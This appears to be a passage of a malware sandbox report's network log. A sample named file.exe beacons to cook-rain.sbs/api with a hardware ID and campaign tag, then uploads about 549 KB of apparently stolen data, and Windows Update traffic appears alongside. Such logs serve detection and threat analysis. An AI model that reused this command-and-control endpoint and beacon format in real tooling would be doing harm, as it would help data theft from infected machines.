                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            5192.168.2.449735104.21.66.384436860C:\Users\user\Desktop\file.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:04:16 UTC275OUTPOST /api HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=KFP4KTPQYDED9UF
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                            Content-Length: 1233
                                                                                                                                                                                            Host: cook-rain.sbs
                                                                                                                                                                                            2024-11-20 20:04:16 UTC1233OUTData Raw: 2d 2d 4b 46 50 34 4b 54 50 51 59 44 45 44 39 55 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 31 39 46 45 37 35 37 38 43 45 46 46 36 37 42 36 33 43 46 43 46 37 45 36 43 34 35 46 38 33 38 0d 0a 2d 2d 4b 46 50 34 4b 54 50 51 59 44 45 44 39 55 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4b 46 50 34 4b 54 50 51 59 44 45 44 39 55 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d
                                                                                                                                                                                            Data Ascii: --KFP4KTPQYDED9UFContent-Disposition: form-data; name="hwid"319FE7578CEFF67B63CFCF7E6C45F838--KFP4KTPQYDED9UFContent-Disposition: form-data; name="pid"1--KFP4KTPQYDED9UFContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic-
                                                                                                                                                                                            2024-11-20 20:04:16 UTC983INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:04:16 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Set-Cookie: PHPSESSID=c44ke1504fbndpoqjuspo70bld; expires=Sun, 16-Mar-2025 13:50:55 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A2wYo7%2FwPYOlxE%2FRN8DUV6aNv94cH42lo6XPUPhBiCtiiEf2aXN0rjROHH0%2FV34OM2IcqVNtoN%2BTMXUolMnrckgaVATw2wzZbK2KYE7QrHzbuiUEcGnW7nbvgLJZzYU8"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8e5b0c524bc5178c-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1728&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2828&recv_bytes=2144&delivery_rate=1706604&cwnd=139&unsent_bytes=0&cid=354b8d52440efd29&ts=802&x=0"
                                                                                                                                                                                            2024-11-20 20:04:16 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                                                                            Data Ascii: eok 8.46.123.75
                                                                                                                                                                                            2024-11-20 20:04:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            6192.168.2.449737104.21.66.384436860C:\Users\user\Desktop\file.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:04:18 UTC272OUTPOST /api HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=4NU6KC249F
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                            Content-Length: 549327
                                                                                                                                                                                            Host: cook-rain.sbs
                                                                                                                                                                                            2024-11-20 20:04:18 UTC15331OUTData Raw: 2d 2d 34 4e 55 36 4b 43 32 34 39 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 31 39 46 45 37 35 37 38 43 45 46 46 36 37 42 36 33 43 46 43 46 37 45 36 43 34 35 46 38 33 38 0d 0a 2d 2d 34 4e 55 36 4b 43 32 34 39 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 34 4e 55 36 4b 43 32 34 39 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 34 4e 55 36 4b 43 32 34 39 46 0d 0a 43 6f
                                                                                                                                                                                            Data Ascii: --4NU6KC249FContent-Disposition: form-data; name="hwid"319FE7578CEFF67B63CFCF7E6C45F838--4NU6KC249FContent-Disposition: form-data; name="pid"1--4NU6KC249FContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--4NU6KC249FCo
                                                                                                                                                                                            2024-11-20 20:04:18 UTC15331OUTData Raw: c0 e4 53 e0 78 38 55 f9 fe 79 04 d4 1b a2 34 14 be 1b 37 0c 78 92 63 62 fd 7f 2e 23 ec ab 00 9a b8 9c 9b 6d f1 97 01 db 27 f9 e8 34 b6 82 98 e9 02 dd d3 58 20 76 45 1d 56 ca 27 24 87 f8 16 9c 75 16 14 08 90 26 ae df 18 3f 11 27 40 9b 2f 56 9f 8a bf 13 6e b7 11 11 70 2c 6c 2f c3 e8 0f 21 5b 67 e7 83 28 e3 20 bc 3e 28 e9 08 f2 9f cc 83 e0 6c a8 52 0a 7f a4 19 2e dc 0f 1c b4 3a 01 b9 9a e7 2d 88 54 df b8 b4 28 70 e3 df 96 8f 03 2e 7d 63 7d ef d2 46 ec 87 9c de a1 43 35 eb 37 ae 52 a1 02 fb 8a 0e 93 92 ab 89 21 ae 93 69 51 28 b8 77 bf 8f 88 11 26 14 99 76 62 68 5a 0e 06 24 f9 c7 53 73 41 71 b0 a3 cb 9a 43 83 06 7e 3a 60 e9 e0 fb 3e 3d b0 dd 58 7e f7 cd a9 d1 c1 8b bb fb bd 6f 9c ec 95 ee 9d 1c 53 b4 7f eb 50 52 95 fd c6 a6 a2 e0 bf 8b 69 b3 87 ff 01 5a 55 a1
                                                                                                                                                                                            Data Ascii: Sx8Uy47xcb.#m'4X vEV'$u&?'@/Vnp,l/![g( >(lR.:-T(p.}c}FC57R!iQ(w&vbhZ$SsAqC~:`>=X~oSPRiZU
                                                                                                                                                                                            2024-11-20 20:04:18 UTC15331OUTData Raw: 9d 48 a9 97 e8 c2 d4 6a 29 bc 6d 0d c6 07 0c d7 52 4d b8 df 3f 8e c7 95 8d 4e 4e 4f 47 d7 e9 4f 28 39 ab 80 9d 8e 11 10 41 6e 1f 9e 6a 19 48 54 51 52 8c 88 fb f5 fe c4 31 f9 48 03 a7 2e 43 9c df 71 15 3e 3f 5e be 5a 57 07 f7 a8 b1 ec d7 bb 0c 02 ff 5d 35 eb 69 81 57 25 3c 3c 9a 9f 47 3c 16 cd 2f b4 a6 d4 b7 24 b4 b3 49 4e fb d5 46 ed a3 38 82 1c 4a 68 0f ce e4 a1 ee 92 78 a5 ca 2b c1 d4 96 3b a1 b5 7b f2 27 e5 fa f9 bf ab 67 4d 5e 19 fd 7d 36 fa 6a 7a c8 3e be bb 41 a2 7d d4 66 c3 e7 8d d1 b0 bf f8 2f c5 da a9 10 7e f4 4f 66 f7 ba d3 15 bf 47 99 86 88 ce 2c d1 ac dc 16 59 a1 f5 e1 d8 63 43 50 77 d4 96 c8 d3 1d 05 2a e9 2c e5 09 5e ba 48 86 c4 0b 76 b0 68 ba 18 73 7c 73 96 db fd 9e a3 df 6a 82 f7 d0 ff b5 c3 b4 b5 93 fe a0 04 e2 5f 94 5d bc 3e 6f 33 12 29
                                                                                                                                                                                            Data Ascii: Hj)mRM?NNOGO(9AnjHTQR1H.Cq>?^ZW]5iW%<<G</$INF8Jhx+;{'gM^}6jz>A}f/~OfG,YcCPw*,^Hvhs|sj_]>o3)
                                                                                                                                                                                            2024-11-20 20:04:18 UTC15331OUTData Raw: 6e 7a 94 f5 a7 67 7b 3f a1 61 46 e5 92 cb 81 8d 17 fd 02 3d 99 15 9f 47 6a 2a 5e fe c3 62 72 f3 63 4f 57 4f ad fc 71 62 52 9b cf 09 75 8d fd dc fa 4d f5 35 76 b7 79 c5 b9 f6 69 7f 26 35 6f 2f 70 14 2e 02 98 5b a7 81 e3 85 1d 3c 3b 75 7a 65 0b 85 59 6e c3 12 ac d2 03 6d 1c 8e 3a 3e dc e6 eb fa a3 7b 11 56 13 72 93 05 d2 40 36 26 e4 96 d7 3c 44 b7 0b b5 37 f8 a0 8e 9f e9 7d 43 6e 33 79 1a 6e a1 05 1c 3e fe da 40 7c 84 29 f0 90 ff ff 8e 40 47 32 47 21 50 86 86 9a 0c c0 b5 b2 5c 44 64 49 44 6a 96 a2 c0 85 90 a7 da 7c 6b 74 71 55 ec ab 57 8a 43 5a 3f 00 61 0f d1 11 f3 0c 4b fc 32 e9 ea c1 0d 2c 7e 62 18 a5 82 02 89 1f 39 21 36 11 36 89 a1 86 4d 56 a5 41 b4 f1 d9 c6 05 57 03 d6 5d ba eb 8d 9b c6 bd 33 86 6b 7d c4 98 c8 c1 1c 01 fa 19 19 18 4d f0 39 eb c2 ad 51
                                                                                                                                                                                            Data Ascii: nzg{?aF=Gj*^brcOWOqbRuM5vyi&5o/p.[<;uzeYnm:>{Vr@6&<D7}Cn3yn>@|)@G2G!P\DdIDj|ktqUWCZ?aK2,~b9!66MVAW]3k}M9Q
                                                                                                                                                                                            2024-11-20 20:04:18 UTC15331OUTData Raw: 2f cf 7b 69 db d3 08 f3 7c 19 f9 da 05 30 95 30 27 e4 d5 fc 1e 33 96 91 68 6a 4f fc 37 12 81 a6 86 8a ed 91 c6 ce a3 3c d1 e6 ed 28 73 27 8d 5f 97 f1 2f fd b6 de 83 e8 8e 73 01 ac 3e 04 89 65 04 30 7d d3 e9 36 6b 66 76 e7 c9 d5 13 9c 6b 06 78 fc 94 6e f0 57 c9 40 2c 0f 46 18 d3 ab 30 8e 66 44 15 75 1b cd c9 7e b0 66 34 19 63 c3 85 1a e5 ad dc 33 9d 92 46 47 c6 ef cc 0c 55 c4 6f be 14 a0 f0 73 ee 8c 06 63 eb 49 b5 d7 99 cc 88 bf 07 c9 75 12 91 c6 75 08 76 20 4c a2 1c 75 89 48 eb 43 33 e2 ca d5 d3 e1 7b 7c 4b 4f f9 54 24 93 2d ed 33 12 70 42 82 fb 19 25 7b 76 e9 70 49 df 65 4d 6f 3c 93 88 3c cc 67 52 f5 63 a5 49 eb e6 6a 66 eb 16 77 58 93 0e 46 08 bc 1e 50 1b cf 7a c3 05 fe 7c 1d 7b 12 59 63 a4 9b 95 c0 2b 04 6e 4f 40 8b e7 4c 33 13 44 63 9f 2f 9c 4b 60 ff
                                                                                                                                                                                            Data Ascii: /{i|00'3hjO7<(s'_/s>e0}6kfvkxnW@,F0fDu~f4c3FGUoscIuuv LuHC3{|KOT$-3pB%{vpIeMo<<gRcIjfwXFPz|{Yc+nO@L3Dc/K`
                                                                                                                                                                                            2024-11-20 20:04:18 UTC15331OUTData Raw: ea f9 61 59 51 e0 d8 24 37 14 a9 f3 f5 db 92 65 7a 45 47 53 3c e7 8a b0 f8 8f bf b9 1d ae d8 3b 70 90 3f 74 02 13 ea 8f fa b1 80 8b cd aa 33 a1 99 87 4d 84 48 70 e6 9f 04 56 7a b1 12 54 ae 8d 83 65 df f4 8a c2 ec dd 32 b0 21 06 7e c9 c5 ae 8f 12 1d 6c 7b 75 96 58 5d df 2d 61 7b e1 85 17 4f ff 77 98 e6 7a 06 f6 0e 97 b4 08 fd 15 62 27 aa ca 44 52 61 9b b1 5a 51 96 dd ba 5a ed 33 94 a1 ee 87 79 af 0f ee cf 3e 73 01 7d 73 8d 71 66 67 a6 c8 55 e8 26 55 5d 73 19 3d 8b 5e ce 99 b1 39 4a a6 b3 96 54 69 63 00 bc 45 33 e6 59 7d a4 34 11 40 d8 23 16 a5 c4 cd 6e d8 5e 1b fc 77 5d 72 a4 86 d9 39 f5 33 41 ee b8 33 bc 0f 34 a8 ec ec 77 98 6d 81 30 e0 90 14 43 be 01 a6 86 5d e2 02 0f c4 19 7a 88 b4 bb 7b 7d df fb ad d9 bb 4d 4c aa 10 7b e3 d7 56 25 2d cb 2f de 64 e9 89
                                                                                                                                                                                            Data Ascii: aYQ$7ezEGS<;p?t3MHpVzTe2!~l{uX]-a{Owzb'DRaZQZ3y>s}sqfgU&U]s=^9JTicE3Y}4@#n^w]r93A34wm0C]z{}ML{V%-/d
                                                                                                                                                                                            2024-11-20 20:04:18 UTC15331OUTData Raw: 71 04 18 36 85 43 d8 51 5c d4 e4 88 8f d6 f3 8f 63 f1 2e 77 02 bf 1d 79 b4 b4 95 e9 65 bc 4f 64 c3 cb 51 40 a1 ba e7 a5 37 a6 68 f8 32 0e 8f f8 fe 3b 1d 3b 56 bc 60 4e e2 ff ba d9 8e a8 03 d2 4e 55 46 37 b3 cd 53 7d 9f 38 b8 f2 4f ea 8e 58 67 1e 44 91 20 4c 28 ed b1 47 8e cd d7 42 60 f6 59 28 44 94 cb 52 86 1c 85 7b 4f 72 b4 ce a5 71 ef f5 a0 63 fa f0 2e 17 89 81 bc f7 23 2d da 36 35 6b 45 b3 3c e4 4a d6 34 33 47 a8 53 34 dc 45 b2 38 a2 fa 08 b0 18 cd d4 40 7d c7 f6 fe a5 0d 57 34 5c c5 41 6a 0d d8 d8 ab 91 e5 90 b5 a3 bd 04 e0 a9 71 82 88 43 21 78 56 b1 73 76 96 c8 24 eb f0 e0 f7 2b 94 ca 5d b7 95 98 23 13 2c 4b b1 2c 6c d8 cf 5f ad fe bf 0b 7c 99 87 99 25 c5 c7 84 17 2e c7 64 ea 60 8c cf 93 7d 79 67 65 e2 0c c5 b1 1c 69 e8 f5 48 dc 6c 71 8c b8 ea 40 98
                                                                                                                                                                                            Data Ascii: q6CQ\c.wyeOdQ@7h2;;V`NNUF7S}8OXgD L(GB`Y(DR{Orqc.#-65kE<J43GS4E8@}W4\AjqC!xVsv$+]#,K,l_|%.d`}ygeiHlq@
                                                                                                                                                                                            2024-11-20 20:04:18 UTC15331OUTData Raw: d8 f4 66 17 77 b4 a3 db fe 18 0a 06 81 47 50 86 c3 de d2 4b c5 72 29 23 2e a7 36 a5 11 9e cb ce 99 c6 4d e8 53 88 d0 48 ac 17 52 9d ba 9a 9d ba eb 0d 06 b8 9c 5f 97 63 c5 3b e3 e5 83 bf fb c2 da f8 e2 a4 6f be 43 f9 d7 a6 32 58 7a 3b f6 b2 88 8c 26 74 93 ac 22 82 a9 d8 6b 90 b0 51 c5 21 dc cb 31 dd df 3f 12 45 51 18 bd b5 4a ae 3c ce d1 ab af e6 a6 fc 03 7a 14 21 0d a3 63 5a 2b d5 cb 1e d6 96 38 31 91 61 f5 29 21 9c db c7 9f 5c 60 55 3a 38 75 24 f7 48 68 f2 91 93 e7 ff 9d 36 63 91 d6 45 77 d8 11 25 df d8 62 db 66 e5 a2 56 7a 4e 43 19 d9 3e 89 3b 2f 2e 4d 1b 8e 7e b2 83 3e f3 3c 81 cf 62 c1 bc 70 5f fa 39 a0 b5 70 80 58 82 40 1c e5 dd 94 ed bf 92 36 80 05 e4 70 e8 1c 1f 28 b7 72 ff e5 ed 7e f2 09 e8 3c c2 89 b1 49 8b c8 3f 75 cb 83 e8 d4 e0 e8 97 55 81 9e
                                                                                                                                                                                            Data Ascii: fwGPKr)#.6MSHR_c;oC2Xz;&t"kQ!1?EQJ<z!cZ+81a)!\`U:8u$Hh6cEw%bfVzNC>;/.M~><bp_9pX@6p(r~<I?uU
                                                                                                                                                                                            2024-11-20 20:04:18 UTC15331OUTData Raw: fa 91 3f de f9 6e 5d d6 96 9f a8 36 27 68 0a 00 09 ac 54 aa 7b 9e 1a 61 41 4f cf 08 7d f4 6e 83 fe d0 89 01 df f4 27 ad dd 9f 1f e6 9b 09 f2 6e cd db 7f 32 a2 fe ef 96 98 20 08 f1 59 5c 44 03 6d fc 15 1c 78 8b 2e 14 40 0d 93 c9 92 ff 04 a7 69 fb 24 6e 1e ab b1 34 e6 f7 d5 41 30 60 c0 09 72 8e 2c b5 17 45 0f 70 28 54 1a e6 4a 1e ee 97 1a 71 8d c7 8e a8 d2 05 30 da 2c cf 68 6a 30 c0 af 3f 66 8d ad 00 3e 15 f3 c1 e3 22 6f b6 e2 f6 4d 5b a1 79 ed 7c f8 cc 9c a9 9a 13 a7 36 9f 55 a4 1a f3 0a 8e 89 df 83 60 a3 6e fd f5 2b 0e 12 a8 eb 09 13 10 b8 41 c0 35 e0 ea 95 a3 42 76 53 f9 01 84 83 56 88 7b 43 77 72 ed 5a 73 66 c9 2e 36 a6 4e 23 d8 cb 96 78 0f cc 6b 74 12 21 e9 60 8d 31 3a 69 13 51 80 db 3e 9b 93 40 17 10 f8 35 65 53 68 63 6b 1b 98 b9 37 b6 fc 8b d7 96 32
                                                                                                                                                                                            Data Ascii: ?n]6'hT{aAO}n'n2 Y\Dmx.@i$n4A0`r,Ep(TJq0,hj0?f>"oM[y|6U`n+A5BvSV{CwrZsf.6N#xkt!`1:iQ>@5eShck72
                                                                                                                                                                                            2024-11-20 20:04:18 UTC15331OUTData Raw: 9c 30 b5 fc 14 cd bf c1 e7 43 40 d7 5e 47 13 ce f0 5f 93 14 74 9c d7 a7 09 7c b5 ff bf 97 de 58 c7 e9 9d cc 84 f8 98 c4 b2 9d 86 bc cc bb 6a 5e 82 88 37 66 d1 63 8d 89 80 61 77 14 e4 1f 9e 51 81 f2 7f 99 31 dd 1d 86 2f 5e fd 22 5a b9 f3 66 31 5b 03 01 91 5f 5c 53 4f 7b b3 ae e6 87 33 12 f2 97 6a 26 5c a6 e0 89 da 26 52 05 5a 5d c0 b2 75 47 e8 51 18 86 a9 41 31 6a 85 a6 38 6f f7 eb cb 45 2a 29 13 00 76 72 f4 8e f3 37 86 7c 67 07 7a 7a 48 1f 70 9d 3f 30 5a 13 de 73 5b c0 31 68 e1 d5 bc bd 0a b1 85 9e e5 31 58 29 37 58 72 d7 25 5f 6c 61 20 4c 2a d2 bb 59 b9 63 6c a9 58 9b 1e 45 ad 9b f5 c8 0b 41 b8 17 30 f6 e7 fa d8 2b c2 20 c4 7b 6e 56 1e 0e f3 83 5e 6b 26 4d 7c d8 93 02 8b 3a 7e a2 4a b2 66 fb 2a b8 ef 25 83 9c 76 93 6d 58 1e 23 d0 fa 73 4d 17 8a f7 a8 9a
                                                                                                                                                                                            Data Ascii: 0C@^G_t|Xj^7fcawQ1/^"Zf1[_\SO{3j&\&RZ]uGQA1j8oE*)vr7|gzzHp?0Zs[1h1X)7Xr%_la L*YclXEA0+ {nV^k&M|:~Jf*%vmX#sM
                                                                                                                                                                                            2024-11-20 20:04:24 UTC985INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:04:23 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Set-Cookie: PHPSESSID=4uopokk7863c3mm9g0fc389u4q; expires=Sun, 16-Mar-2025 13:50:59 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hsiVX3u7a266OjS05FdExvLicOOi%2FfIqokGN5Xw3Asbd2Zqu0IiP9vND2OoHQwP7lQpkwvN8r1U0hYYvcHyDCTSoVDvv339UDp8xv2Gc7O5SvaSwj98%2Bl57FBtan9K4M"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8e5b0c634d214239-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1757&sent=305&recv=572&lost=0&retrans=1&sent_bytes=4198&recv_bytes=551797&delivery_rate=387319&cwnd=227&unsent_bytes=0&cid=9b1777e867528905&ts=5222&x=0"


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            7192.168.2.449736172.202.163.200443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:04:19 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=gzyZfBdA9bgtO6B&MD=sVMyygHk HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                            Host: slscr.update.microsoft.com
                                                                                                                                                                                            2024-11-20 20:04:20 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                            Expires: -1
                                                                                                                                                                                            Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                            ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                                                                                            MS-CorrelationId: 5e3dc883-3ab8-4ede-9c4e-6d50663a8f3a
                                                                                                                                                                                            MS-RequestId: 79ba5616-f30c-458a-87fb-b61a3b9cbedd
                                                                                                                                                                                            MS-CV: I4NCvhKa2E2rqOyF.0
                                                                                                                                                                                            X-Microsoft-SLSClientCache: 2880
                                                                                                                                                                                            Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:04:19 GMT
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Content-Length: 24490
                                                                                                                                                                                            2024-11-20 20:04:20 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                                                                                            Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                                                                                            2024-11-20 20:04:20 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                                                                                            Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            8192.168.2.449742104.21.66.384436860C:\Users\user\Desktop\file.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:04:25 UTC261OUTPOST /api HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                            Content-Length: 88
                                                                                                                                                                                            Host: cook-rain.sbs
                                                                                                                                                                                            2024-11-20 20:04:25 UTC88OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d 26 68 77 69 64 3d 33 31 39 46 45 37 35 37 38 43 45 46 46 36 37 42 36 33 43 46 43 46 37 45 36 43 34 35 46 38 33 38
                                                                                                                                                                                            Data Ascii: act=get_message&ver=4.0&lid=LOGS11--LiveTraffic&j=&hwid=319FE7578CEFF67B63CFCF7E6C45F838
                                                                                                                                                                                            2024-11-20 20:04:26 UTC980INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:04:25 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Set-Cookie: PHPSESSID=pn4o6g44ojue6mh3igs7l17q4k; expires=Sun, 16-Mar-2025 13:51:04 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0JJEE9qbyuIrbpEEkPEF33lzL5KBMi4TVdzkSdW2pgDGlbExusSBz%2Fqxw9G%2F1HDybW6P9rjwjWwEmZnItXCldMxiS1Id8RqcEIJGF1QT57qe4BQ3c%2B7FDw6dJybwIehq"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8e5b0c8c6b220f65-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
